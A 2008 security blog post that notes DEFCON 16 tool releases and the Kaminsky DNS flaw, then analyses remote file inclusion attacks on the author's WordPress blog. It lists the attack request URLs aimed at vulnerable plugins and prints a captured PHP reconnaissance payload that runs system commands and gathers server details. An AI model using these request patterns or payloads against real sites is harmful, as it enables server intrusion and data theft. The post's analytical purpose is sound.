Static in the Ether

With the 16^th incarnation of Defcon having come and gone last week, a number of people have put together a nice list of the various tools released. The ZDnet’s Rob Fuller has done all the hard work of tracking down the various tools and their websites in his article -  entitled “ DEFCON 16: List of tools and stuff released
“seems to be the most definitive.  Another (updated) list is on Rob’s personal site in which he includes some other items like Packet-O-Matic, PE-Scambler andVMware Pen-Testing Framework, alng with a link to the ISO.

Of all the tools release its DAVIX, that makes me happiest, other than it being a relaly slick Compilation of VizSec tools, it also features InetVis, which is a part of the postgraduate research by one of my students (Jean-Pierre van Riel), which I previously posted about.

iKat is the other tool that tickles my fancy.

There are some interesting setf odf Defcon Photos floating around such as these by sits, who has also made available a zip of the of the Defcon 16 CD contents.An 732MB ISO  version is also available that at least has checksums.

I see some fun times ahead!

With the ongoing smoldering relating to the cross platform cross-vendor flaw in DNS as reported by Dan Kaminsky, Christofer Hoff has put a summary of  the situation together, but as a poem.

Its also worth noting that Halvar Flake has stepped up and stated that hes found the bug as well ( so I assume He will be sharing the stage with Dan at Defcon)

Footnote:

While trawling through logs it was interesting to nitice that this post was noted in E-Securre-it and Team Cymru’s security news links links on the 24th of July 2008

The other day morning stated out with a conversation with darb that went as follows:

DARB: so…wordpress hey?
BVI: I got over writing my own code
BVI: now I’m waiting for my blog to be 0wn3d
DARB: you know wordpress is the equivalent of an 8ft tall ogre that stands outside looking pretty, smashes tables when he tries to sit down, and needs 20kg of food every day…and offers little or no protection on the side entrance to your establishment?
BVI: exactly!
DARB: lolz
BVI: mine has a spiked collar and a beware of the ogre sign :-)
DARB: that only scares away legitimate users…bandits read that sign as “come on in, we left the side door open”
BVI: yeah
DARB: I love wordpress docs and plugins
DARB: “just chown your /tmp file, and then chmod 777 everything”

Well not 20 minutes later I noticed a number of Remote file inclusion attacks coming in. Nothing like the ogre having sent out an invite to all and sundry. Attacks were coming looking as follows:

• /blog/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/archives/5/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/archives/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/?flav=rss/wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /blog/wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /blog/archives/14/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo
• /blog/archives/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo
• /blog/archives/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo

In the above the actual path for the exploit codes been replaced with foo, but is of the form of http://site/somepath/tx.txt????, or similar.

Ive now seen this form over eighty different systems. The include file seems to vary ( see below) but the same plugins are being targeted. No real surprise as they have been known exploitable for a while.

• myflash < v1.1 01 May 2007 ISS-XForce
• wordtube < 1.43 01 May 2007 ISS X-Force
• mygallery ≤ v 1.2.1 29 April 2007 ISS-X-force FRsirt

All the requests were may using libwww-perl/5.810, so most likely come from compromised unix systems. the payload file being referred to has been removed, but I found some others, which are no doubt similar. The algorithm being used for the brute forcing is rather dumb. of the entries listed above, only two relate to viable targets for my given install. I found the request for “blog/?flav=rss/….” rather amusing. Another interesting observation is the number of requests centered around http://lair.moria.org/blog/archives/14 my post relating to Windows XP failing to hibernate. I have yet to see hits on any other particular posts.

Looking at the payload code form some of the other similar attacks, I found the following one interesting, as a more human driven recon script providing information for making a value judgment on the target site rather than an automated assault. (When will these people learn that StudlyCaps isn’t really that cool )

echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo “os: $os<br>”;
echo “uname -a: $alb<br>”;
echo “uptime: $alb2<br>”;
echo “id: $alb3<br>”;
echo “pwd: $alb4<br>”;
echo “user: $alb9<br>”;
echo “phpv: $alb6<br>”;
echo “SoftWare: $alb5<br>”;
echo “ServerName: $alb7<br>”;
echo “ServerAddr: $alb8<br>”;
echo “NigeriaN HackerS TeaM<br>”;

Others are not quite so benign, providing command shells, and in some cases drive by exploits using a number of different tools to try download further payloads onto the system or upload password files, webserver configurations and other sensitive information. c99madscript.php really seems to be the flavour of the month with these, although it has been around a while.

What all these attempts that Ive seen do have in common are the trailing “???” or “?????” irrespective of the payload contents of filename. The purpose of these to me is unclear, surely its a pain to type. Is it a bug ina script, or are people trying to do something else.